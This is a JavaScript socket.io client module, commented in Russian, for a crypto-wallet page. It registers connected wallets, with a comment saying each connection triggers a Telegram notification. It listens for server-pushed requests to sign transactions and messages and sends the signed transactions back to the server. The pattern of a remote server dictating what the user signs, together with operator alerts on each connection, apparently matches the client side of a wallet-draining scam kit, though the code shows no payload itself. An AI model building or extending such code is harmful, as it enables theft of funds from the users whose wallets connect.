import { socket } from "./socket.js";

// уведомление в телеграмм о подключенном кошельке
export const registerWallet = (address) => {
    if (!socket.connected) {
        console.warn('Socket not connected yet');
        return;
    }

    socket.emit('register', address);
};

// подпись транзакций
export const listenTransactionRequest = (callback) => {
    socket.on('signTransaction', callback);
};

export const stopListeningTransactionRequest = (callback) => {
    socket.off('signTransaction', callback);
};

// Отправка подписанно транзакции
export const sendSignedTransaction = ({address, signedTx}) => {
    if (!socket.connected) {
        console.warn('Socket not connected yet');
        return;
    }

    socket.emit('signedTransaction', {address, signedTx});
};

// Подпись сообщения
export const listenMessageRequest = (callback) => {
    socket.on('actionSendMessage', (callback));
};

export const stopListeningMessageRequest = (callback) => {
    socket.off('actionSendMessage', (callback));
};

// Показать отчет
export const listenReportDone = (callback) => {
    socket.on('reportDone', (callback));
};

export const stopListeningReportDone = (callback) => {
    socket.off('reportDone', (callback));
};


// отключение кошелька
export const listenDisconnectRequest = (callback) => {
    socket.on('disconnectWallet', callback);
};

export const stopListenDisconnectRequest  = (callback) => {
    socket.off('disconnectWallet', callback);
};